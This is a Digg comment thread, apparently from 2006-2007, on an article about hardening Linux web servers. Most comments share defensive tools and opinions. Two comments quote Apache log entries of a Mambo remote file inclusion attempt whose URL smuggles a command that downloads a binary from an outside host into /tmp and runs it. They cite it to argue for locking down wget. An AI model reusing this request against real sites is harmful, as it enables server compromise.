digg

Facebook Connect Join Digg About

Turn your Linux web server into Fort Knox

freesoftwaremagazine.com An in depth article on how to secure your Linux web server. Who says that security is ever "easy"? It's a must-have for anybody running a web server - even if it's at home.

Who dugg this? Made popular Jun 29, 2006

Digg DudeWhat is Digg?

Digg is a place for people to discover and share content from anywhere on the web. Digg surfaces the best stuff as submitted and voted on by the community. Take the Tour to learn more.

36 Comments

show profanity settings
expand all
  • bobonot, on 10/12/2007, -0/+21Sharks with Friggin' lasers!
  • xero9, on 10/12/2007, -0/+17And no network or power cable attached of course :)
  • V1ncent, on 10/12/2007, -0/+17Of course the most secure system is wrapped in 12 layers of protective concrete and is sitting in the ocean's floor guarded by sharks.
  • jinexile, on 10/12/2007, -0/+17k I tried this and my web server is still not filled with gold.
  • monahmat, on 10/12/2007, -0/+8Great article even if you have no idea how to start cracking down on system security. Go through this and your LAMP server should be safe from almost anything.
  • chinkmasterrice, on 10/12/2007, -0/+6Excellent article. People don't realize that a mismanaged linux box is as bad as say, windows. Digg.
  • MajorHertz, on 10/12/2007, -2/+7Do they have spell check and the like there, too?
  • Ingold, on 10/12/2007, -0/+4On the plus side, its a really good article.. if everyone did this when they setup web servers I gota say the web would just that little better.
  • ohhhL3ThaL, on 10/12/2007, -2/+6404 Spellcheck not found
  • v3xt0r, on 10/12/2007, -0/+4chkrootkit, interesting. the rest is common sense imo. good read either way.
  • MisterCookie, on 10/12/2007, -0/+3Yep. One of the problems with windows is that even if you took away the coding errors, way too many services are enabled by default, such as UnP or NetBIOS.
  • MisterCookie, on 10/12/2007, -0/+3I'm really surprised he didn't mention Denyhosts. Excellent program that prevents brute force SSH logins.
    http://denyhosts.sourceforge.net/
  • drag, on 10/12/2007, -0/+2Anti-virus/Anti-malware/anti-rootkit items like chkrootkit or rootkit hunter are, unfortunately, pretty useless when it comes to security.

    There is two reasons:
    A. Because the rootkit writers have access to those tools also. So all they have to do to defeat them is setup a Linux server and run those programs. If they are detected, then they simply have to modify how thier program works so that they aren't detected anymore. It's almost trivially easy to defeat them with old fasion 'conventional' rootkits.

    B. Also kernel module rootkits are popular nowadays anyways. These are kernel modules that modify how a kernel behaves in order to mask the rootkit itself. These are nearly impossible to detect.

    BTW since Windows 2000 started having acceptable security kernel driver level rootkits for Windows have become popular.

    The only realy effective way to detect a rootkit is to setup a program like Tripwire.

    Tripwire is a program that you use to make checksums of all the files on your computer, then later you can run it to check the checksums. You have to store the checksums output on a secure computer or secure read-only medium (like a cdrom disk.). Also Tripwire is only usefull if you run it from a different operating system then the one your currently running (like say booted up in knoppix cdrom).. This is because it can be defeated by false reports created by a kernel module level rootkit.

    This is better then checksuming stuff offered by RPMs or system level items because those things can be perverted and used against you by the attacker also.

    The other way to detect a rooted machine would be to use a intrusion detection program (IDS for short) like Snort. These IDS's are run by machines that can sniff the network. Often they are completely passive with network taps so that they can read network data, but are inaccessable themselves. Switched networks pose a problem for these things and often you need to have a special passive tap into your switch or just rely on the IDS to detect traffic going in and out of your router/firewall. These things watch traffic patterns and can be configured to detect any sort of network traffic that isn't suppose to happen, then log and probably notify you of it.

    Needless to say to get the most effectiveness out of things like Tripwire and Snort it can get pretty expensive and involved.

    However even though something like Tripwire and IDS can detect lkm rootkits there are no reliable ways to perminately remove a rootkit. You don't know what all the hacker has done to your system.. even if you detect and remove one program there may be others.

    The only way to be sure that a machine is safe after having gotten rooted is to format and reinstall from scratch. If your 100% sure when the attack took place then you can probably get away with restoring from backup..

    Anything else is full of false assuraces and is not trustworthy.

    Windows is the same thing also. If somebody has gained administrative access (rooted your machine) the only safe thing to do is to format and reinstall.

    Needless to say you want to keep your machines secure from attack FIRST rather then worry about detection items like anti-virus or chkrootkit or rootkit hunter.

    Like they say: "A ounce of prevention is worth more then a pound of cure"

    or.. so I don't get accused for being too United States centrics..

    " 2.83495231 decagrams of prevention is worth more then 4.5359237 hectagrams of cure"
  • gigamike, on 10/12/2007, -0/+2Great article and though well versed in security, I picked up some new things. Bad Digg title though, heh. Digg!
  • dwwatk01, on 10/12/2007, -1/+3Wow...take a deeep breath and step away from the computer.

    Psycho.
  • micro506, on 10/12/2007, -0/+2But will this keep that pesky Oddjob out?
  • jwestbrook, on 10/12/2007, -0/+2 digg
    article missed 3 programs I like to include
    rootkit Hunter, portsentry, and denyhosts
  • inactive, on 10/12/2007, -0/+1it's not a BAD tut, and if it stops just one more spam sending zombie i'm glad for it, fort knox? hardly.

    if you want a really secure webserver i have 2 words for you "READONLY FILESYSTEM"
  • Ingold, on 10/12/2007, -2/+3Agh!!! My eyes hurt..
  • sholdowa, on 10/12/2007, -0/+1The other thing that's missing is monitoring software - something that looks for any change in the normal running of the server. I use mrtg, but I'm an old g*t. I'm sure there're alternatives that are simpler to configure.
  • yourabi, on 10/12/2007, -0/+1MisterCookie et al. I don't really feel DenyHosts is all that helpful. A properly configured SSH server with an "AllowUsers" directive, and possibly listening on another port is good enough (IMHO).

    There have been several other articles on securing SSH specifically (in Linux Journal and else where) and so I didn't feel the need to go to great depths securing SSH. That's common in articles. What I did find missing was attention to application level threats.

    The Read-Only filesystem is a good idea -- but not practical. There is always this line of security vs usability -- I think RO FS's increase security for sure -- but at what cost to productivity (having to remount) every time you want to change something -- and what if the server is rooted anyway? Then it's just a big pain.

    Cool!

  • bwoodruff, on 10/12/2007, -0/+1Very nice.
    dugg
  • bsoric, on 10/12/2007, -2/+3I'm NOT SURE exactly what POINT YOU are trying to get ACROSS, there's no FORT KNOX in AUSTRALIA but you don't see me FLYING off THE HANDLE about AMERICANS and their ETHNOCENTRIC WAYS. "FORT KNOX" has BECOME one of THOSE THINGS that PEOPLE say when THEY MEAN secure. YOUR post HAS NO MEANING. IT SEEMS to BE A few unrelated SENTENCES with the OCCASIONAL word in CAPITALS.

    Also, you made at least 14 spelling mistakes.

    Did you actually read the article or did you just see "Linux" and "Fort Knox" in the title? I see you joined yesterday (maybe today in the rest of the world) so I assume you came for the videos, and managed to get lost and end up in the Technology Section. So I'll see you on your way, go back to the Videos section and check out some ub3r kewl article on finger drumming.
  • Gryffydd, on 10/12/2007, -3/+4Fort Knocks is Fort Knocks wherever you're from. It's a metaphor...get over it.
  • incubuz, on 10/12/2007, -0/+1Ups, pasted wrong line. (or it got broken)
    Here is another.

    83.19.xxx.xxx - - [07/Jun/2006:19:44:18 +0200] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid
    ]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.XXX.XXX/cmd.gif?
    &cmd=cd%20/tmp;
    wget%2072.18.XXX.XXX/lnikon;chmod%20744%20lnikon;
    ./lnikon;echo%20YYY;echo| HTTP/1.1" 404 293 "-"
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  • incubuz, on 10/12/2007, -0/+1Disable the ability of the httpd / apache user to run wget.
    I have seen many attempted automated attacks trying to use wget.

    200.14.XXX.XXX - - [04/Jun/2006:15:01:30 +0200] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.XXX.XXX/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 287

    groupadd wget
    chown root:wget /usr/bin/wget
    chmod 750 /usr/bin/wget
  • chieffy, on 10/12/2007, -0/+1Isn't that four words?
  • inactive, on 10/12/2007, -0/+1maybe :|
  • ngfkjiohodns, on 10/12/2007, -1/+1I got into Fort Knox... Not saying much.
  • inactive, on 10/12/2007, -0/+0@drag,

    Do you know what algorithm tripwire uses to generate its checksums? I know awhile ago that it used md5, but I haven't used it since they broke md5. Are they onto a different algorithm now, or can you choose a different one?
  • Gryffydd, on 10/12/2007, -1/+1I just realized I picked the one and only misspelling of Fort Knox that he *didn't* use in his post. Oops. I meant to say "Fort Nox is Fort Kynox wherever you're from."
  • Splitt3rxx, on 10/12/2007, -1/+1hpw the ***** do you turn a computer into fort knox? damn, I guess those linux devs can do anything.
  • drag, on 10/12/2007, -0/+0If you want to be a person with "moderate to advanced understanding of compilers and programming architecture" there are lots of good papers on things about Stack Smash Protection and such items.

    OpenBSD folks are probably going to be the formost on things like this that don't require special propriatory stuff or charge you money for information and such things, and are stuff you can impliment yourself.
    http://www.bytelabs.org/papers.html
    Check out the paper Paper title: "Integration of Security Measures and Techniques in an Operating System (considering OpenBSD as an example)"

    For Linux and GCC Redhat took a lot of work into rewriting ProPolice SSP (developed originally out of IBM's japan branch) and getting into the GCC release. I beleive it's in GCC 4.1.

    Also introduced into the lifetime of the 2.6.x kernel release has been things like heap protection and support for the 'no execute' bit and such.

    A example of this being used to protect a vunerable program is outlined in this Debian-Administrator.org article..
    http://www.debian-administration.org/articles/408

    And of course Wikipedia has a good article on it.
    http://en.wikipedia.org/wiki/StackGuard

    Other things for Linux (like he mentioned)
    grsecurity http://www.grsecurity.net/
    AppArmor (from Novell) http://www.novell.com/apparmor
    SELinux (from the NSA (United States Government) and made workable by Redhat for their Enterprise Linux and Fedora Core stuff.

    All sorts of fun stuff.

    These sort of things are normally more at the distribution/developers level and not realy something a administrator can impliment themselves.
  • ali3n, on 10/12/2007, -0/+0>by MisterCookie
    >
    >I'm really surprised he didn't mention Denyhosts. Excellent program that prevents brute force SSH logins.
    >http://denyhosts.sourceforge.net/

    Denyhosts has definitely helped out our production servers by keeping the load averages down by blocking abusive ssh denial of service attacks. With some of the hardening mentioned in the article applied alongside Hardened Gentoo Linux a server could withstand allot of abusive exploit attacks. By using a system which compiles binaries as position independent every binaries memory execution insertion address is randomized. While this can be something more suited to administrators with a moderate to advanced understanding of compilers and programming architecture when used alongside grsecurity framework execution of a binary uses a different hexadecimal memory address which enforces a policy akin to winning the lottery for any malicious cracker. Our production 64bit and 32bit servers all have been using hardened gentoo for years and to date we have never experienced a system compromise. http://hardened.gentoo.org
  • chinkmasterrice, on 10/12/2007, -2/+0Shhh, quiet now, your done.
  • inactive, on 10/12/2007, -28/+0FORT KYNOX? r u KIDDING ME?????? I am ffom BANGLADESH and we dont ehven have a FORT NOX here so that is a very ETHNOCENTRIC response to your typical ELITIST LINUX USER mentality. I am the writer of hte LINUX in bangaldesh and we do a lot more serving than you do in AMERICA! we have call centers, rapid responses ecneters, imploye traineing centers, and the software delveoper centers - ALL LINUX BASED. and we are to tell you, that we are the ones who are makign the LINUX happen in the world, not your FORT KNOXS!

  • Add a Comment

    Login or register to comment!
    Or, sign-in super fast with your Facebook account ...


© Digg Inc. 2009 — Content created and posted by Digg users is dedicated to the public domain | Terms of Use Updated | Privacy Policy
DIGG, DIGG IT, DUGG, DIGG THIS, Digg graphics, logos, designs, page headers, button icons, scripts, and other service names are the trademarks of Digg Inc.